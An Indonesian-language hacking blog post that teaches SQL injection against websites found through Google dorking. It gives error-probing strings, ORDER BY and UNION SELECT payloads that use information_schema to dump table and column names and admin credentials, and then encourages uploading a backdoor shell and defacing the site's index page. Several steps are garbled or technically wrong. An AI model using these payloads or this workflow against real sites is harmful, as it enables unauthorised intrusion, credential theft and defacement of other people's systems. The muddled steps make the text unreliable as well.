Sqli Attack

Apa itu sql injection dan cara mengeklpoitasinya

Hallo perkenalkan SkySec.saya berasal dari indonesia jawa tengah,pada post pertama kali ini saya akan membuat tutorial apa itu sqli dan cara exploitasinya.

A.Pengertian sqli

Di kutip dari wikipedia adalah sebuah teknik yang menyalahgunakan yang terjadi dalam lapisan basis data sebuah aplikasi.

SQL dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain.

B.Penyebab terjadinya sqli

sqli terjadi karena tidak ada filterasi syntax atau karaketer.contoh karakter (') dan (-).sehinnga attacker bisa mengeklpoitasinya dengan mudah.contoh string untuk mengexploitasi sqli :

1.--+

2.+--+

3.)--

4.)--+

5.+--+

6.))--+

C.Cara mengeklpoitasi sqli

Hal yang pertama di lakukan adalah Dorking dahulu,apa itu dorking?,Dorking adalah search engine untuk memudahkan menumakan alamat site yang kita inginkan dan terindex oleh google.untuk contohnya sobat bisa search di google.setelah sobat melakukan dorking,dan menemukan targetnya soobat bisa langsung ekseskusi dengan megikuti cara berikut :

1.Pastikan web tersebut vuln atau memiliki celah sql.caranya tinggal diberikan tanda (‘) di belakang parameternya contoh : www.blaa.com/

2.masukan exploitnya dengan cara hapus dahulu %27/lainya.setelah itu masukin

+order+by+1--

+Order+by+2--

Sampai angka eror

Misal jika eror di angka 6 berarti dia memiliki tabel 5 angka.mengapa demikian karena angka 6 itu tidak termasuk,sobat tau aray?nah jika tau seperti itu kurang lebih.

3.jika sudah eror silahkan sobat ketik :

Union+select+1,2,3,4,5—

NB : nanti akan muncul angka di dalam web tersebut.

4.setelah itu nanti ada tulisan column yang eror misal angka 3

.kemudian sobat ganti angka togelnya/columnny(3).di ganti dengan

group_concat(table_name),angka lanjutanya.

Union+select+1,2,group_concat(table_name),4,5--

5.selanjutnya ketik

From+information_schema.tables+where+table_schema=database()—

Setelah di angka.

Contoh : union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=databse()—

Tekan enter

Nanti akan muncul columnya.

6..setelah muncul columnya ganti (table_name) menjadi (column_name) dan +from+information_schema.tables.kata .tables di ganti dengan .columns

kata database di ganti dengan CHAR

7.kemudian sobat buka www.easycalculation.com/ASCII binary converter

Masukan column yang ingin di converter.tunggu nanti akan keluar angka angka.jika sudah keluar sobat tinggal copy saja lalu masukan angka tadi di bagian CHAR(angka converter)—

NB : BERIKAN TANDA KOMA (,)SETELAH SPASI.CONTOH 89, 15, 110

Contoh : union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_schema=CHAR(89, 15, 110)—

Tekan enter

Nah jika sobat sudah menemukan user dan passwordnya silahkan sobat bisa cari admin loginya.jika belum sobat harus sabar mencarinya hehehee.

8.Setelah masuk ke dashboard admin.sobat bisa upload shell backdoor kemudian tebas index dengan script deface sobat hehehe.

Sekian dan terima kasih,mohon maaf apabila ada kesalahan kata atau kurang jelas dalam penyampainya,jangan lupa follow blog ini dan support selalu.

jangan lupa visit https://home.amikom.ac.id/ dan https://seccodeid.com/

Sqli Attack

Apa itu sql injection dan cara mengeklpoitasinya

A.Pengertian sqli

B.Penyebab terjadinya sqli

C.Cara mengeklpoitasi sqli

Komentar